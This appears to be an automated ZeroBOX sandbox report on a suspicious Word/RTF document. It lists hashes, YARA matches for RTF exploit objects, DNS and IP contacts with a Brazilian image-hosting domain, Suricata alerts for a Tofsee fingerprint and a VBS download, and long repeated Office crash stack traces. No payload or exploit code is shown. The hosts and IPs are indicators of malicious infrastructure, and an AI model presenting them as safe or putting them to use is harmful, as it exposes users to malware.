Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 7, 2023, 2:45 p.m.	Oct. 7, 2023, 2:48 p.m.

Size	24.3KB
Type	ISO-8859 text, with very long lines, with CRLF, CR, LF line terminators
MD5	`15c5d883802631d122728961cb66c596`
SHA256	`b624c560e650166622f41685a97c64d39365868e1895802874567b58af84805d`
CRC32	`9CE8D5B0`
ssdeep	`384:upKHC3icIosEVZTz4RQT03QKu3UnXdiKxh3f2:4icicIosEreQTOq8BD+`
Yara	SUSP_INDICATOR_RTF_MalVer_Objects - Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents. Rich_Text_Format_Zero - Rich Text Format Signature Zero MS_RTF_Suspicious_documents - Suspicious documents using RTF document OLE object

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\x.x.x.x.doc
1156

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.27
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
121.254.136.9	Active	Moloch
164.124.101.2	Active	Moloch
172.67.215.45	Active	Moloch
193.42.33.63	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 172.67.215.45:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49163 -> 193.42.33.63:80	2027260	ET INFO Dotted Quad Host VBS Request	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49166 172.67.215.45:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2998168 registers.edi: 1974991376 registers.eax: 2998168 registers.ebp: 2998248 registers.edx: 0 registers.ebx: 80601356 registers.esi: 2147944126 registers.ecx: 3225736246	1
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2997860 registers.edi: 1974991376 registers.eax: 2997860 registers.ebp: 2997940 registers.edx: 0 registers.ebx: 80643212 registers.esi: 2147944122 registers.ecx: 3225736246	1
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5 SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629 SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412 SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x67bfa648 _MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94 _MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823 _MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3 _MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f _MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05 _MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456 0x59363a _MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49 _MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc _MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61 _MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808 _MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8 _MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d _MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad _MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d _MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189 _MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b _MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9 _MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117 DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2 DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 3067700 registers.edi: 3067864 registers.eax: 3067700 registers.ebp: 3067780 registers.edx: 0 registers.ebx: 3068916 registers.esi: 3221549073 registers.ecx: 2147483648	1

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 7, 2023, 2:45 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2998168
registers.edi: 1974991376
registers.eax: 2998168
registers.ebp: 2998248
registers.edx: 0
registers.ebx: 80601356
registers.esi: 2147944126
registers.ecx: 3225736246

__exception__

Oct. 7, 2023, 2:45 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
